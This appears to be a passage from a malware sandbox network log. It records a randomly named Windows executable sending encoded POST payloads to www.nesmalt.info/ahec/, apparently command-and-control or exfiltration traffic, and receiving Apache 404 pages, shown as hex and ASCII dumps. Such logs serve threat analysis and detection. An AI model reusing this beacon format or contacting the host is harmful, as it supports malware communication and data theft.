                                                                                                                                                            22192.168.2.44976266.29.155.54805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:51:50.635157108 CET758OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.nesmalt.info
                                                                                                                                                            Origin: http://www.nesmalt.info
                                                                                                                                                            Referer: http://www.nesmalt.info/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 4f 52 44 6d 59 6c 34 34 41 45 53 77 32 55 4f 42 30 52 7a 78 47 31 2b 7a 59 6e 4e 49 4e 6c 46 6b 43 52 70 69 73 56 51 66 7a 4b 52 6c 4e 44 52 63 43 74 6f 61 64 6a 76 76 4b 73 4b 58 64 77 46 47 43 67 65 68 4f 68 55 58 55 4f 36 55 47 64 53 33 32 6d 70 52 61 63 7a 67 65 62 4c 53 45 41 6b 44 50 41 62 4d 74 38 68 65 59 43 71 69 77 61 53 74 49 70 78 35 34 44 59 2b 37 48 58 45 6e 70 50 39 2f 39 4d 53 48 76 49 46 2f 71 47 64 61 2f 33 51 42 44 57 45 70 7a 6f 62 4e 2b 44 58 75 4a 45 4c 54 37 65 79 51 62 53 37 4e 52 51 52 7a 78 42 77 6a 68 77 6e 72 6a 63 64 57 74 77 4a 4b 74 63 78 34 58 62 75 33 53 45 3d
                                                                                                                                                            Data Ascii: XveXHZvx=ORDmYl44AESw2UOB0RzxG1+zYnNINlFkCRpisVQfzKRlNDRcCtoadjvvKsKXdwFGCgehOhUXUO6UGdS32mpRaczgebLSEAkDPAbMt8heYCqiwaStIpx54DY+7HXEnpP9/9MSHvIF/qGda/3QBDWEpzobN+DXuJELT7eyQbS7NRQRzxBwjhwnrjcdWtwJKtcx4Xbu3SE=
                                                                                                                                                            Dec 8, 2023 14:51:50.925204039 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:50 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 5278
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                                                                                                            Dec 8, 2023 14:51:50.925232887 CET1286INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                                                                                                            Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                                                                                                            Dec 8, 2023 14:51:50.925378084 CET1286INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                                                                                                            Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                                                                                                            Dec 8, 2023 14:51:50.925425053 CET1286INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                                                                                                            Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                                                                                                            Dec 8, 2023 14:51:50.925646067 CET279INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                                                                                                            Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            23192.168.2.44976366.29.155.5480
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:51:53.354933023 CET10840OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.nesmalt.info
                                                                                                                                                            Origin: http://www.nesmalt.info
                                                                                                                                                            Referer: http://www.nesmalt.info/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 4f 52 44 6d 59 6c 34 34 41 45 53 77 32 55 4f 42 30 52 7a 78 47 31 2b 7a 59 6e 4e 49 4e 6c 46 6b 43 52 70 69 73 56 51 66 7a 4b 5a 6c 4e 78 70 63 44 4f 77 61 63 6a 76 76 44 4d 4b 55 64 77 45 47 43 67 47 6c 4f 68 4a 73 55 4e 43 55 47 2b 71 33 2b 30 4e 52 55 63 7a 67 44 4c 4c 58 4b 67 6b 57 50 41 4c 41 74 2f 4a 65 59 43 71 69 77 5a 36 74 4c 34 78 35 36 44 59 39 79 6e 58 2b 6a 70 50 52 2f 35 68 74 48 76 4e 79 38 65 4b 64 61 66 48 51 44 31 4b 45 68 7a 6f 5a 49 2b 44 50 75 4a 49 49 54 37 54 4a 51 61 57 56 4e 54 4d 52 6c 51 73 59 78 56 38 39 34 77 56 47 57 75 30 39 52 38 31 76 67 30 76 74 73 45 45 69 55 5a 52 6d 46 42 37 46 5a 47 30 52 41 4c 4e 78 30 45 49 34 6d 6a 58 52 43 5a 46 76 51 36 6b 64 72 49 70 53 39 50 67 51 33 66 43 4e 57 57 6b 74 6f 53 46 56 57 66 39 75 6d 35 41 42 59 6b 75 5a 6d 79 55 5a 65 72 48 4b 75 30 42 42 35 38 4b 71 6d 6f 74 44 39 48 75 4a 32 6a 7a 49 2f 74 50 34 46 30 41 4f 4e 36 67 52 42 77 34 6c 42 56 57 38 76 38 39 4e 73 49 75 47 66 36 4e 69 59 7a 58 44 37 65 65 42 77 2f 46 42 6c 70 4f 7a 63 4e 30 67 70 53 50 50 47 67 48 4a 38 72 63 78 4a 34 50 63 6d 4e 65 76 48 6a 61 64 4c 39 34 62 6e 61 54 62 4b 76 73 58 48 4d 44 43 42 76 78 37 78 59 35 42 79 54 4a 59 69 2b 48 64 55 38 33 41 52 48 4f 7a 6c 43 57 6d 36 45 69 50 4b 4b 59 32 70 66 58 47 64 55 33 72 43 73 76 55 4b 48 61 45 5a 31 73 6a 54 47 67 53 70 43 47 35 75 33 50 71 7a 6c 6d 77 4e 4a 58 45 74 4c 65 50 4b 48 35 36 62 6d 41 41 53 61 6c 6f 57 64 75 4e 39 54 6b 43 70 7a 35 56 6b 30 76 55 38 48 4b 76 4b 67 4e 6b 4a 6b 73 49 63 6c 69 31 63 36 32 50 57 4e 37 69 66 61 65 4c 78 4c 46 51 73 72 4c 74 59 4f 70 59 42 71 45 71 41 70 6f 2f 42 73 36 41 62 65 30 39 5a 49 2b 43 47 30 6c 6c 58 61 72 37 78 38 55 4c 4e 68 54 75 34 7a 2f 31 2b 4f 48 35 73 77 78 79 4a 56 72 44 55 6d 6f 68 4b 4b 53 50 59 67 56 4d 5a 39 63 67 7a 79 44 64 61 57 4e 56 66 41 34 7a 50 33 43 4f 6c 6b 65 4c 65 52 6b 30 35 4b 71 5a 73 61 69 6f 2f 61 7a 2f 48 61 62 57 6f 41 71 2f 52 31 61 77 67 34 63 62 65 58 45 76 39 51 4c 49 46 66 52 4e 6c 32 35 46 75 4d 30 2f 65 6d 51 32 45 39 44 66 68 68 43 37 6c 7a 58 4f 31 42 78 49 71 4f 69 45 62 70 4c 64 4c 77 6e 71 63 72 67 35 4c 6e 76 71 72 34 7a 76 30 58 77 71 4e 66 41 62 39 41 59 46 34 63 42 31 2b 37 30 67 7a 34 79 48 48 79 4a 41 45 49 45 48 34 43 34 4a 55 43 6f 6a 4a 67 32 6e 44 46 73 2b 63 51 67 2b 30 67 49 35 55 45 57 6b 46 6e 36 65 4d 57 4e 38 56 50 58 63 56 64 38 49 6b 59 52 58 4f 37 65 59 61 71 55 77 52 58 31 5a 69 46 5a 67 30 78 58 62 44 45 58 4e 6b 53 71 36 33 44 77 34 75 48 44 31 59 49 34 34 78 4f 6c 6c 72 44 50 75 6f 50 4a 33 42 43 56 41 33 30 63 39 47 64 30 6b 6e 70 7a 4d 65 6c 52 6d 6e 45 32 59 68 4f 4b 69 65 59 4a 74 30 78 6b 4b 2f 54 73 42 4c 31 31 35 6c 53 59 32 66 53 64 39 79 6e 6a 6d 57 44 30 45 38 47 72 56 44 39 6d 79 45 36 6e 6d 71 46 4d 66 75 6b 78 59 72 67 62 37 68 39 4d 2f 4d 6a 69 33 57 61 7a 44 59 38 49 59 4f 4d 36 57 53 7a 47 32 65 47 6f 6b 54 77 72 4e 4b 53 51 43 45 6d 54 4f 46 43 62 30 75 75 39 70 76 32 4f 33 37 63 45 58 69 75 75 42 38 37 6f 5a 6c 38 4a 78 4a 52 46 46 58 70 4c 7a 30 48 2f 47 37 78 46 2b 37 4e 51 6c 67 33 62 78 59 70 30 33 44 54 37 72 78 31 6f 79 63 39 4a 57 36 46 34 31 51 30 71 58 2f 75 67 5a 69 77 39 4d 51 33 6e 42 36 6b 4d 49 4a 6e 4b 77 66 47 6f 44 67 6d 7a 43 68 30 68 75 31 6a 4b 4e 46 6c 32 53 6f 6f 54 54 77 34 41 5a 4c 2b 57 4c 51 6a 56 74 72 2f 49 69 6d 4e 54 37 70 32 56 6e 48 45 53 4b 63 72 6f 7a 78 76 30 56 39 76 42 72 69 45 66 34 6e 51 59 4e 34 6a 6b 63 55 2f 7a 55 39 33 4a 39 66 55 63 51 55 74 52 58 35 75 75 31 32 31 38 57 31 73 39 62 50 4b 75 47 65 31 61 6e 4d 74 42 66 2b 4e 49 44 46 6b 4c 67 72 4c 5a 46 64 68 6f 4b 4c 70 5a 41 4e 37 62 50 56 33 30 74 42 53 4c 6e 54 6f 58 33 4a 36 4e 51 48 31 5a 59 6c 42 74 68 65 4d 78 4b 32 39 56 43 70 45 44 56 69 59 67 77 2f 51 32 52 5a 49 7a 36 70 56 76 4a 71 6c 49 5a 57 74 33 68 68 75 7a 49 64 7a 56 55 6e 4c 41 79 4d 52 78 56 6d 51 61 45 33 77 55 35 59 46 76 4b 6f 74 5a 45 5a 59 6e 69 34 2f 49 73 54 53 30 44 74 67 48 6d 4b 58 2f 69 34 72 71 2f 6c 54 69 52 52 50 62 7a 4c 47 6b 52 73 58 62 44 61 61 64 4f 39 47 48 64 35 4e 38 78 4d 43
                                                                                                                                                            Data Ascii: XveXHZvx=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
                                                                                                                                                            Dec 8, 2023 14:51:53.648900986 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:53 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 5278
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 